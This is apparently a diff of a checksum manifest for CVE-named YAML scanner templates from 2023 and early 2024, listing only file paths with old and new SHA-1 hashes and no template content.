+http/cves/2023/CVE-2023-38203.yaml:c59d035901d7b673fda7c46633013784828c95c0 +http/cves/2023/CVE-2023-38205.yaml:dde3c7e1a96a0780715e447411138049c1c4f23d +http/cves/2023/CVE-2023-3836.yaml:3189f131c74d753b3f456ca5ac3faf0c2f3e0e80 +http/cves/2023/CVE-2023-3843.yaml:e8aeab54aa508fc232b867618cdb37eaa7d9061e +http/cves/2023/CVE-2023-38433.yaml:850b3ba22d16833e0e5888ae6428b255bb7edd2d http/cves/2023/CVE-2023-3844.yaml:41358b9a547fc658630cd5192e8f5fd24359d2b1 -http/cves/2023/CVE-2023-3845.yaml:a058fa56bd9afd4c7fe9039d01299be7f2b0387b +http/cves/2023/CVE-2023-3845.yaml:ce7fcd2beaf4569029a2858d37901b8cf459d940 http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 -http/cves/2023/CVE-2023-3847.yaml:19741808d71bd63c323ccebb3f1d2ba9ef1de84d -http/cves/2023/CVE-2023-3848.yaml:2ee0f1cd35093ecbc95d6463be4d7c0b96be887d -http/cves/2023/CVE-2023-3849.yaml:f55bec87afdb536995985bc94a3a789752373543 -http/cves/2023/CVE-2023-38501.yaml:7d6a6df111f2736db6f28c4f5b8f70bc26903486 -http/cves/2023/CVE-2023-38646.yaml:cc57e9d1027bbe9145a4a8e1f1e88156deb06350 -http/cves/2023/CVE-2023-38964.yaml:e1c3467ec6d109844705546205c87d038110b216 -http/cves/2023/CVE-2023-39002.yaml:52ebe9dff5ee28922febf801a3bb95030da8acad -http/cves/2023/CVE-2023-39026.yaml:041116b66d543937bdc51c4430296fb2a3b5b8a3 -http/cves/2023/CVE-2023-39108.yaml:c1b83450ef1e0a64d4b9d9eae5406929006b9806 -http/cves/2023/CVE-2023-39109.yaml:127b33851616ea34701f58d253e55e469a64571d -http/cves/2023/CVE-2023-39110.yaml:de40021a1ae0f2751f435cc3884f568ce795422a +http/cves/2023/CVE-2023-3847.yaml:60407e2940cf8f721eb6f942c68ee24d68185a34 +http/cves/2023/CVE-2023-3848.yaml:0dfa9f82d648a6f7c421af52421bded8f1f5bb6d +http/cves/2023/CVE-2023-3849.yaml:8d921cdb62c336eadc8abebe7947cad3ec493b27 +http/cves/2023/CVE-2023-38501.yaml:caacffd1047e5d298f452d113ed290181b54a1f8 +http/cves/2023/CVE-2023-38646.yaml:b545190ed42626f3a49b4bc2bd98ec54899acbc2 +http/cves/2023/CVE-2023-38964.yaml:5c49a7987f8b490e18be173969a1371cd0d8a41d +http/cves/2023/CVE-2023-39002.yaml:3449001ccee7076abec235de9bd4659071202c37 +http/cves/2023/CVE-2023-39026.yaml:fc71aafa8c88cc2a530f4a7842ff2ba12d6c6eed +http/cves/2023/CVE-2023-39108.yaml:f5db8fc08678303bd462b24bf153d3c23c0350ec +http/cves/2023/CVE-2023-39109.yaml:3e84fb48e4dea9672eaac9e32660ae57ffede95a +http/cves/2023/CVE-2023-39110.yaml:1d75da26409647a1f57071a40f570b28ea1c210a http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:107751338e25ebbd981829c2d937e9a1f8f60c31 -http/cves/2023/CVE-2023-39143.yaml:e20d6dbb9d5c577e44cf112ff83030e9e694bc11 -http/cves/2023/CVE-2023-3936.yaml:8286c086051a0b10e973d57c92c958e57a5257dd -http/cves/2023/CVE-2023-39361.yaml:3e466a41d9e0eade6589f47678451baf6ebbbebc -http/cves/2023/CVE-2023-39598.yaml:b6cbf6f5f31905988a1568ec0ad02d638a60c8a5 -http/cves/2023/CVE-2023-39600.yaml:f594f2061238379154bf97dcf1ff8830362c94b4 -http/cves/2023/CVE-2023-39676.yaml:6ae66310705d77a801f51b24c4f23badc1f9ffd9 -http/cves/2023/CVE-2023-39677.yaml:ccad01e66e9c6cbfa8c85c6946710f37fb4be991 -http/cves/2023/CVE-2023-39700.yaml:f31e713f3b9d4e03948d00ad0d94e84fc08d13d3 -http/cves/2023/CVE-2023-39796.yaml:652e2a7957da667b3dd805940d9de12d10e0ce7e -http/cves/2023/CVE-2023-40208.yaml:d26fb10881a5128ffe3884f4ae0c5df84784fd98 -http/cves/2023/CVE-2023-40355.yaml:e830e5b4bfdd4361ebf7066155078da07a178821 -http/cves/2023/CVE-2023-40779.yaml:79d01a88f26d82c5f4256632542249ca4e6ae608 -http/cves/2023/CVE-2023-4110.yaml:0093d833acd76053a647314f2896e274d1254cff -http/cves/2023/CVE-2023-41109.yaml:58697d5ce98d5cc1842596763241100ff1afb0b4 -http/cves/2023/CVE-2023-4111.yaml:ae83919e66a9f5addc96ea0f7f859e8c08ff9115 -http/cves/2023/CVE-2023-4112.yaml:f148ae909334c925f571ce9de4ce07fabfb16d89 -http/cves/2023/CVE-2023-4113.yaml:389451cef87bb8ffaabfc8213665370d035280e1 -http/cves/2023/CVE-2023-4114.yaml:a22313e17040379001d1e9eef07dc34529e2249b -http/cves/2023/CVE-2023-4115.yaml:0eb9bb4aaea99ff7103d00edb065f20f52a7d2eb -http/cves/2023/CVE-2023-4116.yaml:e91e80aad8c3b22ff58d3a6535088b3a36f284af -http/cves/2023/CVE-2023-41265.yaml:5f472d26913bc18ac633b38588b85a1346d74bb6 -http/cves/2023/CVE-2023-41266.yaml:71f32d9b3d35beba978e80492799b8e3ebeebaef -http/cves/2023/CVE-2023-4148.yaml:49e8f3a0a99a43b86cf98bf0aa5987008f76118f -http/cves/2023/CVE-2023-41538.yaml:c9051b5fe3e82378f98ff3d81323ec2b7c0f09ed -http/cves/2023/CVE-2023-41642.yaml:45ca13061c37fa3cd5e207717a72a365a1387207 -http/cves/2023/CVE-2023-4168.yaml:9155e9ec28f2164a98ee91eb94a8068c65893efe -http/cves/2023/CVE-2023-4169.yaml:52b490d095332be0ae34ac4b731f5e9e717fc128 -http/cves/2023/CVE-2023-4173.yaml:86e4e5336155967198130352e74e6959e95444b6 -http/cves/2023/CVE-2023-4174.yaml:fa3a8f00b09fc61884d81b2d8b65086459cb417c -http/cves/2023/CVE-2023-41763.yaml:fd53172133c81d605446ea08aba8b5c917baad00 -http/cves/2023/CVE-2023-41892.yaml:4eb18a27213425ee06bf5bf2d68c9d59d7cf6189 +http/cves/2023/CVE-2023-39141.yaml:1f5741a82daa48e1242abe049c9c2ac7d63b9673 +http/cves/2023/CVE-2023-39143.yaml:175a3cbb4a85e3c56d37dd43f0316984a11bcaf4 +http/cves/2023/CVE-2023-3936.yaml:86f325fd48ca47e7f4cdfe3581027bc2514c4f12 +http/cves/2023/CVE-2023-39361.yaml:53379bb2dc1b7b6fda25a6b9b031da51b7017423 +http/cves/2023/CVE-2023-39598.yaml:9049f96d9df80ac7f18e9dc60b243a9a29b29454 +http/cves/2023/CVE-2023-39600.yaml:19487bb36baf066ca01bf3fab2c013086083c304 +http/cves/2023/CVE-2023-39676.yaml:22d457a3bdff95a774399f03bf8a75a652a8789f +http/cves/2023/CVE-2023-39677.yaml:0ad5146b105373f328f09bbee9b0394c8186ac63 +http/cves/2023/CVE-2023-39700.yaml:01ab37659c7031b101f3ea6bd08134b98d8a317b +http/cves/2023/CVE-2023-39796.yaml:a729bba89e9885a729b5fd594b78afc93de872b1 +http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f +http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d +http/cves/2023/CVE-2023-40779.yaml:4cd840617f8f7a59b0d31f37c0a0d2c089c2762a +http/cves/2023/CVE-2023-4110.yaml:83f4284a809037eb7d4ef4b7b3f11deadb3440af +http/cves/2023/CVE-2023-41109.yaml:c8149b1952ea7315ce40e355fd02b165c46cbad8 +http/cves/2023/CVE-2023-4111.yaml:437dd6aa165710e549632a8b1a48ba5bdfed9c4a +http/cves/2023/CVE-2023-4112.yaml:189a46f7d9458fd3110e2c9828872deb106f1e5f +http/cves/2023/CVE-2023-4113.yaml:9718137c9767d86dce907f001a2e138fb4d7841e +http/cves/2023/CVE-2023-4114.yaml:5ba02fe30cf771bc4115635a3984bebc3457118b +http/cves/2023/CVE-2023-4115.yaml:b0d90d4bf5bb9dcac3b1b52d45aaa0f2d586613e +http/cves/2023/CVE-2023-4116.yaml:79915a9eaf103dac3be5fc934c949e78fbd319e2 +http/cves/2023/CVE-2023-41265.yaml:d38544289b23e65bb65723da2f94d926e03bc3e0 +http/cves/2023/CVE-2023-41266.yaml:f7cb353f5de770a87d089f632b1612052f0319d0 +http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 +http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c +http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e +http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 +http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 +http/cves/2023/CVE-2023-4173.yaml:365d1cb5b2bebe20e788d65518fc610e8a22ce87 +http/cves/2023/CVE-2023-4174.yaml:fc65029f2aaeebb1a5e37d04bfc498941a584c0d +http/cves/2023/CVE-2023-41763.yaml:536064beb3e34c084d16d18c2bed0f5db2296bfc +http/cves/2023/CVE-2023-41892.yaml:f6020a88dbaff06019ec79f60686616bb17db2b2 http/cves/2023/CVE-2023-42343.yaml:c1bffaa8664049b88b3f225dccf9b3e372fdf1bd http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:5b93bd3379eb1286c01369b8ac0db7274951a209 -http/cves/2023/CVE-2023-42793.yaml:7609627dfc943e8a98e63a223c2666acbe6f88be -http/cves/2023/CVE-2023-43177.yaml:3fc70b3e12cd6c102e9a912a5ec99deda74fb2d9 -http/cves/2023/CVE-2023-43187.yaml:bc5c5b9d077e21da92d16d832b6bdfbaa107b85b -http/cves/2023/CVE-2023-43208.yaml:9571171f304a06c1e2e175e83f87717c7574d327 -http/cves/2023/CVE-2023-43261.yaml:353153b24243a42ec58e7d82b93ca737b0f44081 -http/cves/2023/CVE-2023-43325.yaml:dea8bfbceeb76f9949bcbe3953c866b40e42b9f6 -http/cves/2023/CVE-2023-43326.yaml:e65d5e0574b5dbb97f7f15499a1dfd45cc9bd8af -http/cves/2023/CVE-2023-43374.yaml:4390a5192fbce5dcd0ae6cbaea3baac59ea72a17 -http/cves/2023/CVE-2023-43795.yaml:04fb141516ef06b963bd3c63b4b41f3e901f6b54 -http/cves/2023/CVE-2023-4415.yaml:ef3f313e45a4a534af38945a6409948358549ae3 -http/cves/2023/CVE-2023-44352.yaml:2f065bd348decd9a4ef21471a01821dfd7e64e74 -http/cves/2023/CVE-2023-44353.yaml:29dc295e3d7d42134ad3c53ce51c6f2263134055 -http/cves/2023/CVE-2023-4451.yaml:c5b9465bf0dc2e2f9631d686d15d0e616cb4489d -http/cves/2023/CVE-2023-44812.yaml:ee661e9f8e533aadb1b5646815991b454d5f1a50 -http/cves/2023/CVE-2023-44813.yaml:f8897152666aadf2fb7a52d8317115f24321b469 -http/cves/2023/CVE-2023-4521.yaml:cd4aff1800214d7703661498ae91ee2101070b4a -http/cves/2023/CVE-2023-45375.yaml:36bdf1a241658b6b389fe31a66d62e913d9217dd -http/cves/2023/CVE-2023-4542.yaml:7796c7d2400f3188394c96d287f226ee141b7d0b -http/cves/2023/CVE-2023-4547.yaml:757165c5376f308ea1d88713aa90b620c94b6949 -http/cves/2023/CVE-2023-45542.yaml:fbab2269d3d329f1ac722842d4852760eb4a33f4 -http/cves/2023/CVE-2023-45671.yaml:44371e98ac18a13b6f4913a31db8b25bf8a6976f -http/cves/2023/CVE-2023-4568.yaml:499f357c250a5fe0e30c20955f817a63c4ead9a6 -http/cves/2023/CVE-2023-45852.yaml:b6e39de864aba6e0fe97f4a681d46e2f3a364238 -http/cves/2023/CVE-2023-45855.yaml:ea4416c0b3b510bbe87c43955e30a945834d1566 -http/cves/2023/CVE-2023-4596.yaml:0cd82451c3af3de042fb9028a37d07e9cf29983a -http/cves/2023/CVE-2023-4634.yaml:9911ff9ad5e096083e2f8082a22b868aa7f261a3 -http/cves/2023/CVE-2023-46347.yaml:bb0f1e67bb28da1b426e41802d4bb0d6f61035ec -http/cves/2023/CVE-2023-46359.yaml:e099ca11dccb079f80b7a6a2f428506692b5bc83 -http/cves/2023/CVE-2023-46574.yaml:d047c8594bd07e24c92dce889e0c211c73b7dd22 -http/cves/2023/CVE-2023-46747.yaml:70d00d50e355533780d4855cf0360b20144f8afc -http/cves/2023/CVE-2023-46805.yaml:49bde9b8955972ec5ac1dd765914358605c31f92 +http/cves/2023/CVE-2023-42442.yaml:d758c6128139420e4eac53717980f5e310e7a0cb +http/cves/2023/CVE-2023-42793.yaml:b72d97514990752b6ccc63f48b6782d6467ac42b +http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a +http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 +http/cves/2023/CVE-2023-43208.yaml:f1ece752ca9942c76379ef47d20c1dc6f6814173 +http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 +http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f +http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d +http/cves/2023/CVE-2023-43374.yaml:d3716d82a599eec38d7248bceb7a95b73dd5812f +http/cves/2023/CVE-2023-43795.yaml:ac764a43ee503fd6799b47c652c8b23fa413e1ac +http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a +http/cves/2023/CVE-2023-44352.yaml:f48ccac60a8d013601f2e1706e8326e3243cc2c6 +http/cves/2023/CVE-2023-44353.yaml:82991b999365d1cac94d95fd52aff5f8ea89506b +http/cves/2023/CVE-2023-4451.yaml:d912d3e1ed3cc84ee7b6416839b28a16e5566955 +http/cves/2023/CVE-2023-44812.yaml:f2aaf62c29bd8b70f20804e1b56537d9f5ec3712 +http/cves/2023/CVE-2023-44813.yaml:350f2faeb325dd8eb6e0c73262240ef5a2eeccbd +http/cves/2023/CVE-2023-4521.yaml:4e3f3a6520dae179752fb5bf24b967b99d65f4a1 +http/cves/2023/CVE-2023-45375.yaml:a49c50475479435dd05b4a3f6ff7549e2e4de081 +http/cves/2023/CVE-2023-4542.yaml:94982eb03aa4a5a1d8d17e37d9a3e7110da81d64 +http/cves/2023/CVE-2023-4547.yaml:f35005a0035fb0980139129649d73a6f577bbd66 +http/cves/2023/CVE-2023-45542.yaml:137cadf0894adf5a9bbb7e447a9b7d4d2ca849e6 +http/cves/2023/CVE-2023-45671.yaml:f573f401497165968fc2e77f7c722accd3052148 +http/cves/2023/CVE-2023-4568.yaml:b3519b98d445f49c15ec25def5abf6f71f7502a1 +http/cves/2023/CVE-2023-45852.yaml:d333744fa6118d998f0dc5f601625859966c461d +http/cves/2023/CVE-2023-45855.yaml:467a093aca097d3c97d6fce9fa38725202433759 +http/cves/2023/CVE-2023-4596.yaml:6e50ca87bfa5d77ea31f04d6bb5022c236ac9340 +http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc +http/cves/2023/CVE-2023-46347.yaml:b34a7dc91ea30e9c2109c7b75f3672336a67738c +http/cves/2023/CVE-2023-46359.yaml:9c1bcb93e8ca6c307f8ac5012de374ed21837245 +http/cves/2023/CVE-2023-46574.yaml:ad5fe1bb6f5e09d7a12160ada18cf418316d3182 +http/cves/2023/CVE-2023-46747.yaml:b27d327fbc25444c121c20945c0e2fad4a913f53 +http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 -http/cves/2023/CVE-2023-4714.yaml:9e54ad7ef07ff844f390a7b8b884063dd3491f74 -http/cves/2023/CVE-2023-47211.yaml:e1381355d1efad0bda01b17816a75d6df2972bb3 -http/cves/2023/CVE-2023-47218.yaml:b0c24c4a4961ef70ed0cd35250c8c70f00cde6fd -http/cves/2023/CVE-2023-47246.yaml:04af302e2804cdab8c72c3a73c19b91db29a646c -http/cves/2023/CVE-2023-47643.yaml:0eea9fe823d7a83cb7b1399798a95d421841fa63 +http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 +http/cves/2023/CVE-2023-47211.yaml:aba86670623dcf39feb32dd7042ab9a29ed72a45 +http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa +http/cves/2023/CVE-2023-47246.yaml:7f0547a2b48fb64eef94636f8033c984eda1840c +http/cves/2023/CVE-2023-47643.yaml:9a9f282f0113bc4a94d4cd55d184bd13e6488e76 http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:b5181539e5c575cfeac27ad62e94f9e2459b7ced +http/cves/2023/CVE-2023-48084.yaml:eff7decc7c45e122e653f200399885bb44ff01f6 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 -http/cves/2023/CVE-2023-49070.yaml:65e0930328b458ab7e4213c9782efa52b73fb507 -http/cves/2023/CVE-2023-49103.yaml:f5757f90f945c79084ee7a8e4431ccf8bdecc58c -http/cves/2023/CVE-2023-4966.yaml:1a39adf34b4332b05432f084bdda7d88bfb899c4 -http/cves/2023/CVE-2023-4973.yaml:9d8c23669f0b1fb8ef2f819f6ff0df9e838816d6 -http/cves/2023/CVE-2023-4974.yaml:95265a132c2a648c8f300f6b598af0090ed6b7a8 -http/cves/2023/CVE-2023-49785.yaml:3c952b09c12553c59b87955301943b4a7571bc8f -http/cves/2023/CVE-2023-5003.yaml:44df345838430a46851567849110fb4ec89e1e2f -http/cves/2023/CVE-2023-50290.yaml:0da1226999b17e405296b4e45193b418fda58f26 -http/cves/2023/CVE-2023-5074.yaml:e03366c2de9746143fb284e90422d9cf4b2c684a -http/cves/2023/CVE-2023-5089.yaml:ab5fdcebc0ea3196856dc0b6bfe7b95c5e27a366 -http/cves/2023/CVE-2023-50917.yaml:183f41d5151e36eaadb744564a2f3e9dd830b72e -http/cves/2023/CVE-2023-50968.yaml:b1faf39acf862d06ffda53e8710e8cf1afae17e8 -http/cves/2023/CVE-2023-51467.yaml:c0eb1dcb70d547279a1e26e464acea6f9332ae0a -http/cves/2023/CVE-2023-52085.yaml:f1a43c0e82be4e6ae94f5403b92df1173f1a7786 -http/cves/2023/CVE-2023-5244.yaml:7c81d0654ee6997857ff2bc8db90c9ed2ce2b2f5 -http/cves/2023/CVE-2023-5360.yaml:5a0953946a042f7a8fd406380fa54b3088f7f643 -http/cves/2023/CVE-2023-5375.yaml:0ec7f1a46cd93b5d2d78086baccb701fa2af2207 -http/cves/2023/CVE-2023-5556.yaml:b6c708adff651f31ba82db7bc458982513ebe287 -http/cves/2023/CVE-2023-5830.yaml:58fcd24876880ad298f4b9827096c3f95d443577 -http/cves/2023/CVE-2023-5914.yaml:a7a4abc8e632a96c541984a6e47b834f1a931037 -http/cves/2023/CVE-2023-5991.yaml:71a29af2239b64d52ad3aa7bb799c284d74ac2f1 -http/cves/2023/CVE-2023-6018.yaml:0cf547ac6737dc4aec9443e34e331cd477e63f34 -http/cves/2023/CVE-2023-6020.yaml:12c27a4b3c8ba5a23f1deaa5a751adbdde5aca0e -http/cves/2023/CVE-2023-6021.yaml:78b6bcae9d5a27f05380dccf231430030f86b377 -http/cves/2023/CVE-2023-6023.yaml:647fa12f828736a1e60899d855c2ee3413776f04 -http/cves/2023/CVE-2023-6038.yaml:edbf511e8df255d81032508ae0db5da0878e9306 -http/cves/2023/CVE-2023-6063.yaml:3aff55fe4445b86e5ef515902a0460a5a683440a -http/cves/2023/CVE-2023-6065.yaml:43d54ded80789f0d3854c9f6a8af5f2a4d745be1 -http/cves/2023/CVE-2023-6114.yaml:f90be5554fc97d768bfb627c3a898da9663f8db4 -http/cves/2023/CVE-2023-6360.yaml:6e0753aac7b53d1c7bc9ae41a078eb0582912162 -http/cves/2023/CVE-2023-6379.yaml:613d522af5db85c143fdcc2b38dfaa26ca136ef0 -http/cves/2023/CVE-2023-6380.yaml:859a707d6c9c81e4c3e8781a3beff189b51c8f49 -http/cves/2023/CVE-2023-6389.yaml:d0ed9d0fd87114fa3f29d8a4165d42fe6c79f343 -http/cves/2023/CVE-2023-6553.yaml:b2e33e3f496ce2052a849e370f8a9f4f52e619f2 -http/cves/2023/CVE-2023-6567.yaml:1d4f79dc0de243eab84fc5ac41220aac35476c2e -http/cves/2023/CVE-2023-6623.yaml:95a28cb42b74962a876414ea6387f16836f5ba48 -http/cves/2023/CVE-2023-6634.yaml:58d0acfc67990c665c1a4dd288d7735aab2a1999 -http/cves/2023/CVE-2023-6831.yaml:6660cec376c2fd84924762f057aaf7739a8e7afc -http/cves/2023/CVE-2023-6875.yaml:3b87c1cc3387c7eefb5a420057312c9416d4e191 -http/cves/2023/CVE-2023-6895.yaml:7ff1cccef6008880bb745da89ab0776719f590c9 -http/cves/2023/CVE-2023-6909.yaml:7f1c1674a74c530291653e3e4af3a8a7064b8176 -http/cves/2023/CVE-2023-6977.yaml:62a94baffe86139a9983e2b81d2b6bb522ab72d1 -http/cves/2023/CVE-2023-6989.yaml:fb7348efce4dfc99db7b9a2d0216d4c6cba74f6e -http/cves/2023/CVE-2023-7028.yaml:5e8b05b284c13ecabce6ee3c42d1804054abdb56 -http/cves/2024/CVE-2024-0195.yaml:9a92a4d8719e68413de8d1fade2119e0a623f21d -http/cves/2024/CVE-2024-0200.yaml:62d03d5fdc128f489257fefda03aa4ac148b510a -http/cves/2024/CVE-2024-0204.yaml:c94c5ccdd259b91be5958278994a3f6e228c0eef -http/cves/2024/CVE-2024-0235.yaml:a22bdc7ca804a6d0311f17c87cce6d5cf903825f -http/cves/2024/CVE-2024-0305.yaml:6bf530b827ae9684e18b3fbf2ae8210d0f724155 -http/cves/2024/CVE-2024-0337.yaml:f77b7bd1d93eda04a6aaf94f99ac1766cceda25c -http/cves/2024/CVE-2024-0352.yaml:c262817270ffae9efcec3d8996ea81f3f7b8b3fe -http/cves/2024/CVE-2024-0713.yaml:68de9c6afca59de5238a26024c82547a6ba57cea +http/cves/2023/CVE-2023-49070.yaml:6c28abe1b512113e46615f78c895b0f8b7d88a53 +http/cves/2023/CVE-2023-49103.yaml:df7f916859a7176f5867dd438b7b25c4598e8194 +http/cves/2023/CVE-2023-4966.yaml:afd8e0c40d087f04b630fbe118e1eaa3cab06596 +http/cves/2023/CVE-2023-4973.yaml:abedefada4ac0c871cf7f7d70b2a34ad065b7ba7 +http/cves/2023/CVE-2023-4974.yaml:17ee929a70a9d371a6eb202b2d989b57e6fc371f +http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 +http/cves/2023/CVE-2023-5003.yaml:a391fe60d1332779d04102762bfaac503c01b99f +http/cves/2023/CVE-2023-50290.yaml:a89cabb1f8777c2fa48dc314c6a8bb482d2a3806 +http/cves/2023/CVE-2023-5074.yaml:2f91841fa7a9ca7839288a0c2539941f0e9f815b +http/cves/2023/CVE-2023-5089.yaml:b49f08cd62fce95d77dfdd2c17355553b5b78c24 +http/cves/2023/CVE-2023-50917.yaml:24ba1b92719da10e25c7faa5a21b8e1793efc1e6 +http/cves/2023/CVE-2023-50968.yaml:1c7231aa1afc9b9f470216bd2f64d2e084e0c564 +http/cves/2023/CVE-2023-51467.yaml:ea8aacef3fc466e4a13378dffd2b8bb52defa1fa +http/cves/2023/CVE-2023-52085.yaml:cc65c397628889cec7f61857da0b323c8b0e7f4e +http/cves/2023/CVE-2023-5244.yaml:03d55a9e17a9b51e7a9aa871411021c9a98da704 +http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 +http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc +http/cves/2023/CVE-2023-5556.yaml:d4312b384f0e855174b1ac442795700fc93c8bbf +http/cves/2023/CVE-2023-5830.yaml:1aa70a4ec2154915982b9abe3a74c505dfb4d780 +http/cves/2023/CVE-2023-5914.yaml:475f2bb7c026929585409314f7c8fd6f35cce886 +http/cves/2023/CVE-2023-5991.yaml:9873fa30a831b40e777a00fc4ac02f243ac75b69 +http/cves/2023/CVE-2023-6018.yaml:0ebc4933948b094af932753294baf1f5f43be5ad +http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 +http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 +http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 +http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 +http/cves/2023/CVE-2023-6063.yaml:32096f6833a737d95a0ecdc8efd59c606fddd027 +http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 +http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe +http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 +http/cves/2023/CVE-2023-6379.yaml:344ac33322c6ae6e332b9223d49a9a728489231b +http/cves/2023/CVE-2023-6380.yaml:b8c966913d7f35aa184b05f6c05c139d619191b0 +http/cves/2023/CVE-2023-6389.yaml:80902b5a71d8f7f58b612c269eac562c10153ff1 +http/cves/2023/CVE-2023-6553.yaml:c572f40098138cb52f89c91950c68594cce89adf +http/cves/2023/CVE-2023-6567.yaml:1bd331b977c1566ead0ba2214ef5e0c1e41970cf +http/cves/2023/CVE-2023-6623.yaml:e781090c3c7e05d6ac52f9ed663eb47bc99f9e72 +http/cves/2023/CVE-2023-6634.yaml:271edc659ab6198e503f6b2f853dd7b638123507 +http/cves/2023/CVE-2023-6831.yaml:61fad718001632269bbc179436be24568b060fd4 +http/cves/2023/CVE-2023-6875.yaml:49ae1c1fe43946afb693947ae99199caa87c21b6 +http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c +http/cves/2023/CVE-2023-6909.yaml:3a1c12f4b5868f39c614d7b619700d37dedd588b +http/cves/2023/CVE-2023-6977.yaml:57fe00b51cc1fda9f7e1850ccd265acc0f52ef69 +http/cves/2023/CVE-2023-6989.yaml:8510679254d0c54f4292b95a24fc1344d768c3b2 +http/cves/2023/CVE-2023-7028.yaml:56b5cd908db926c6a908a68d79b3304f6f327a5e +http/cves/2024/CVE-2024-0195.yaml:1029799f6633077e409b399fb30e7e44cdb20487 +http/cves/2024/CVE-2024-0200.yaml:8def6d854c9af306acaea3df5ce36cf2067e255a +http/cves/2024/CVE-2024-0204.yaml:e9fa443bf70ed09783f89718081890844601391f +http/cves/2024/CVE-2024-0235.yaml:a7f3ae0fbae1d5e167c40c248558a60e210ee480 +http/cves/2024/CVE-2024-0305.yaml:4c322a618eab85bc9f4809462de046feaaeb0701 +http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 +http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 +http/cves/2024/CVE-2024-0713.yaml:4233f7803e3cb90da0851977a4c6de497a18d61b http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:81d7ffc9d132b673f7757d6b08c2dbd2847a0f9b +http/cves/2024/CVE-2024-1021.yaml:99e0b72a97304c3bf86a4a78e5f6b721221683fb http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d -http/cves/2024/CVE-2024-1071.yaml:3af798153fa941a00376b2dc03502960fbc1f36d +http/cves/2024/CVE-2024-1071.yaml:4db8738e930dacc926156a093eed6602d60a583a http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 -http/cves/2024/CVE-2024-1208.yaml:287c09eb17c7864442f835df934c7f4dfa4d520a -http/cves/2024/CVE-2024-1209.yaml:aed0338ee5cf0a1a0ba5e259d5afa5fd9b088df4 -http/cves/2024/CVE-2024-1210.yaml:7eb962fcb42e13310c5eed2005e9d72ba1acacdc +http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e +http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c +http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:1d7ea0ff7ffee2714ab6c591394b11cd5151eab6 +http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:af397b8d43398034dfb882a890a13219e972ffdb -http/cves/2024/CVE-2024-20767.yaml:624154e090933ad51bbcb882a5bd52fbf70928cd -http/cves/2024/CVE-2024-21644.yaml:1f73c9ae6bf21e7ca3d0cfabb439ef772287aa7b -http/cves/2024/CVE-2024-21645.yaml:d371558dd931ed3b6eec1e8e7401ca4a0f8b6319 